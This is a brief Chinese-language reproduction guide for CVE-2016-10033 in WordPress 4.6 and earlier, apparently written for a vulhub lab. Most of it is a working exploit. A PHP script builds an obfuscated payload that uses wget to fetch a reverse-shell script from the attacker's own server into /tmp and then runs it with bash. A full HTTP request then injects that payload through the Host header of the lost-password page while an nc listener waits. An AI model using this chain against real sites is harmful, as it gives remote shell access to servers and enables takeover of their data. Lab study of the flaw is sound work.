WordPress
1.漏洞复现
CVE-2016-10033(vulhub pwnscriptum)
影响范围:WordPress <= 4.6
访问 http://IP/wp-admin/install.php 进行安装
使用PHP脚本生成Payload
<?php $shell1 = '/usr/bin/wget --output-document /tmp/shell 自己网站IP/shell.txt'; //下载反弹shell脚本 $shell2 = '/bin/bash /tmp/shell'; //运行脚本 $shell1 = str_replace('/','${substr{0}{1}{$spool_directory}}',str_replace(' ','${substr{10}{1}{$tod_log}}',$shell1)); $shell2 = str_replace('/','${substr{0}{1}{$spool_directory}}',str_replace(' ','${substr{10}{1}{$tod_log}}',$shell2)); echo 'target(any -froot@localhost -be ${run{'.$shell1.'}} null)<br><br>'; echo 'target(any -froot@localhost -be ${run{'.$shell2.'}} null)';
访问忘记密码页面,路径:/wp-login.php?action=lostpassword
先用NC监听,将 Host 改为 Payload 反弹shell
POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null) Content-Length: 85 Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP+Cookie+check Connection: close user_login=admin&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81
